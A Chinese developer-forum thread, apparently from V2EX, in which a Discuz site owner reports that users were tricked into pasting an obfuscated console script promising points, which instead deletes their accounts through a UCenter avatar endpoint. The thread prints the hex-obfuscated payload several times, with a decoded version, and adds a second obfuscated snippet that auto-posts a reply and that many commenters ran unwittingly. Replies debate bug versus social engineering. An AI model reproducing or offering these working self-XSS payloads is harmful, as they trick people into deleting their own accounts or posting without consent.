discuz 漏洞真 j8 多 有人在我论坛搞事情。。。传播一段 js 把我论坛搞炸了
Event 2018-11-11 23:15:27 +08:00 via Android 9800 次点击这是一个创建于 2530 天前的主题,其中的信息可能已经有所发展或是发生改变。
这两天有人在我站水帖。。。。。告诉别的用户在 console 执行一段脚本能领到积分。。结果他们自己账号变得乱七八糟的了。。。
废话不说。。。上代码 你们自己看看
location['\x68\x72\x65\x66']=((d=(await(await fetch("\x2e\x2f\x68\x6f\x6d\x65\x2e\x70\x68\x70\x3f\x6d\x6f\x64\x3d\x73\x70\x61\x63\x65\x63\x70\x26\x61\x63\x3d\x61\x76\x61\x74\x61\x72",{credentials:'\x69\x6e\x63\x6c\x75\x64\x65'}))['\x74\x65\x78\x74']())['\x6d\x61\x74\x63\x68'](/\/\/\S+\/images\/ca\S+&ag/g)[0]['\x72\x65\x70\x6c\x61\x63\x65']('\x69\x6d\x61\x67\x65\x73\x2f\x63\x61\x6d\x65\x72\x61\x2e\x73\x77\x66\x3f','\x3f\x6d\x3d\x75\x73\x65\x72\x26\x61\x3d\x64\x65\x6c\x65\x74\x65\x26'))&&confirm('\u7eff\u5b9d\u77f3'))?d:'';
废话不说。。。上代码 你们自己看看
location['\x68\x72\x65\x66']=((d=(await(await fetch("\x2e\x2f\x68\x6f\x6d\x65\x2e\x70\x68\x70\x3f\x6d\x6f\x64\x3d\x73\x70\x61\x63\x65\x63\x70\x26\x61\x63\x3d\x61\x76\x61\x74\x61\x72",{credentials:'\x69\x6e\x63\x6c\x75\x64\x65'}))['\x74\x65\x78\x74']())['\x6d\x61\x74\x63\x68'](/\/\/\S+\/images\/ca\S+&ag/g)[0]['\x72\x65\x70\x6c\x61\x63\x65']('\x69\x6d\x61\x67\x65\x73\x2f\x63\x61\x6d\x65\x72\x61\x2e\x73\x77\x66\x3f','\x3f\x6d\x3d\x75\x73\x65\x72\x26\x61\x3d\x64\x65\x6c\x65\x74\x65\x26'))&&confirm('\u7eff\u5b9d\u77f3'))?d:'';
 | 1 Event OP 具体账号发生了什么神奇的变化。。 你们自己试试看吧 我很无奈 。。 |
| 2 Event OP 而且貌似不是软层的。。。直接从 sql 层干掉了? |
| 3 Event OP 哦对。。输完后退出帐号 重新登录才能看到效果 |
 | 5 suit 2018-11-11 23:29:37 +08:00 没有变化 |
| 9 Event OP @suit 我在 dz 的 oschina 里面找到了 issue。。。貌似是个 ucenter 的 bug |
 | 12 ScotGu 2018-11-11 23:47:01 +08:00 |
 | 13 t6attack 2018-11-11 23:47:50 +08:00 location['href'] = ((d = (await(await fetch("./home.php?mod=spacecp&ac=avatar", { credentials: 'include' }))['text']())['match'](/\/\/\S+\/images\/ca\S+&ag/g)[0]['replace']('images/camera.swf?', '?m=user&a=delete&')) && confirm('绿宝石')) ? d : ''; |
| 14 t6attack 2018-11-11 23:57:12 +08:00 让用户自己执行动作代码,这,,这算漏洞?!下面代码可以在 v2 执行 $("\x23\x72\x65\x70\x6c\x79\x5f\x63\x6f\x6e\x74\x65\x6e\x74")["\x76\x61\x6c"]("\u6240\u4ee5\u4f60\u4eec\u5230\u5e95\u5acc\x4a\x53\u6743\u9650\u592a\u5927\u8fd8\u662f\u592a\u5c0f\u4e86\uff1f\uff1f");$("\x23\x72\x65\x70\x6c\x79\x5f\x63\x6f\x6e\x74\x65\x6e\x74")["\x70\x61\x72\x65\x6e\x74"]()["\x73\x75\x62\x6d\x69\x74"](); |
 | 15 mengyaoss77 2018-11-12 00:01:33 +08:00 所以你们到底嫌 JS 权限太大还是太小了?? |
 | 16 dot2017 2018-11-12 00:01:37 +08:00  1 这个 bug 老早就有了,利用 uc 头像删除自己的账号。临时解决办法是切换到 H5 头像模式,X3.4 自带了 |
| 18 Event OP @mengyaoss77 是程序权限没控制好 |
 | 19 Perry 2018-11-12 00:03:48 +08:00 via iPhone 这是 social engineering 不是 bug |
| 20 mengyaoss77 2018-11-12 00:04:41 +08:00 @Event #18 这是我执行 14 楼的代码自动回复的  |
 | 22 airyland 2018-11-12 00:33:03 +08:00 所以你们到底嫌 JS 权限太大还是太小了?? |
| 23 airyland 2018-11-12 00:34:07 +08:00 试了楼上的代码,自动发出回复了。。 |
 | 24 crab 2018-11-12 00:38:22 +08:00 |
| 25 crab 2018-11-12 00:38:36 +08:00 3  |
 | 26 KasuganoSoras 2018-11-12 03:46:02 +08:00 via Android 这个 bug 老早就有了,我成功删了自己在很多论坛的账号。 不过我现在都自己开发论坛了,不用 Discuz |
 | 27 kzfile 2018-11-12 07:55:46 +08:00 所以你们到底嫌 JS 权限太大还是太小了?? |
 | 28 murmur 2018-11-12 08:09:25 +08:00 为什么那么多网站都在 console 里打东西提醒用户不要执行陌生人发来的代码 |
 | 29 ThirdFlame 2018-11-12 08:41:49 +08:00 人肉型 CSRF |
 | 30 lixueyu001 2018-11-12 08:45:24 +08:00 所以你们到底嫌 JS 权限太大还是太小了?? |
 | 31 dumbass 2018-11-12 08:49:18 +08:00 所以你们到底嫌 JS 权限太大还是太小了?? |
 | 32 v9ex 2018-11-12 08:51:32 +08:00 $("\x23\x72\x65\x70\x6c\x79\x5f\x63\x6f\x6e\x74\x65\x6e\x74")["\x76\x61\x6c"]("\u6240\u4ee5\u4f60\u4eec\u5230\u5e95\u5acc\x4a\x53\u6743\u9650\u592a\u5927\u8fd8\u662f\u592a\u5c0f\u4e86\uff1f\uff1f");$("\x23\x72\x65\x70\x6c\x79\x5f\x63\x6f\x6e\x74\x65\x6e\x74")["\x70\x61\x72\x65\x6e\x74"]()["\x73\x75\x62\x6d\x69\x74"](); |
 | 33 Removable 2018-11-12 08:57:24 +08:00 所以你们到底嫌 JS 权限太大还是太小了?? |
 | 34 respect11 2018-11-12 08:58:39 +08:00 via iPhone 所以你们到底嫌 JS 权限太大还是太小了?? |
 | 35 s527332935 2018-11-12 09:07:54 +08:00 所以你们到底嫌 JS 权限太大还是太小了?? |
 | 36 Lebal 2018-11-12 09:14:33 +08:00 所以你们到底嫌 JS 权限太大还是太小了?? |
 | 37 FakeLeung 2018-11-12 09:16:14 +08:00 location['href']=( (d=(await(await fetch("./home.php?mod=spacecp&ac=avatar", {credentials: 'include'})['text']())['match'](/\/\/\S+\/images\/ca\S+&ag/g)[0]['replace']('images/camera.swf?', '?m=user&a=delete&')&&confirm('绿宝石'))?d:'';  来来来,大神们分析一下,这是 js 的问题还是后端的问题? @respect11 @Removable @bojackhorseman @lixueyu001 @airyland |
 | 38 autoxbc 2018-11-12 09:38:44 +08:00 其实是人的问题,在微利下人就失去理智,罔顾不懂的事情不要做的常识,跟技术没半点关系 |
 | 39 crystom 2018-11-12 10:22:43 +08:00 所以你们到底嫌 JS 权限太大还是太小了?? |
 | 40 cookii 2018-11-12 11:36:31 +08:00 所以你们到底嫌 JS 权限太大还是太小了?? |
 | 41 exceloo 2018-11-12 11:38:54 +08:00 这和 js 有半毛钱关系,只是诱导用户自己去删除帐号罢了。前端发的请求,js 都能模拟,用户自己作死去跑莫名其妙的代码你再牛逼也防不住啊。客户端执行的,又不是在服务端,还能咋办 |
 | 42 simple11 2018-11-12 11:43:36 +08:00 所以你们到底嫌 JS 权限太大还是太小了?? |
 | 44 hero2040407 2018-11-12 12:50:18 +08:00 所以说删除用户这种操作需要一个提醒吧,点一下就直接删掉了? |
 | 46 sparkssssssss 2018-11-12 13:19:52 +08:00 我擦,楼主好歹说下,运行的后果啊,我刚运行了下把我的账号给删掉了.................. |
 | 47 onionnews 2018-11-12 15:44:47 +08:00 想利用这个代码删掉那些论坛账号的,但是我执行了不管用,跳转到 500 了。是程序版本问题? |
 | 48 kn007 2018-11-12 15:51:41 +08:00 好久前就见过了,DZ 一直没修复。 |
 | 49 roryzh 2018-11-12 16:08:09 +08:00 所以你们到底嫌 JS 权限太大还是太小了?? |
 | 50 Jiaming 2018-11-13 09:00:23 +08:00 所以你们到底嫌 JS 权限太大还是太小了?? |
| 51 roryzh 2018-11-13 17:16:15 +08:00 所以你们到底嫌 JS 权限太大还是太小了?? |
 | 52 Fakey2 2018-12-07 12:21:48 +08:00 这不是漏洞,这只是诱导类似钓鱼了,安全意识薄弱的人才会上当,根本也不是 DZ 本身的漏洞。。。我让你在 console 执行你就执行,这不是傻子行为么。。。所以跟 DZ 本身没关系。。。 |
 | 53 xemtof 2019-01-09 18:59:34 +08:00 所以你们到底嫌 JS 权限太大还是太小了?? |
 | 54 uyhsefwa 2019-05-16 10:27:08 +08:00 所以你们到底嫌 JS 权限太大还是太小了?? |
 | 55 xmdhs 2020-02-26 22:17:41 +08:00 所以你们到底嫌 JS 权限太大还是太小了?? |
 | 56 binnerchen 2020-11-29 13:10:48 +08:00 所以你们到底嫌 JS 权限太大还是太小了?? |
Select Lanuage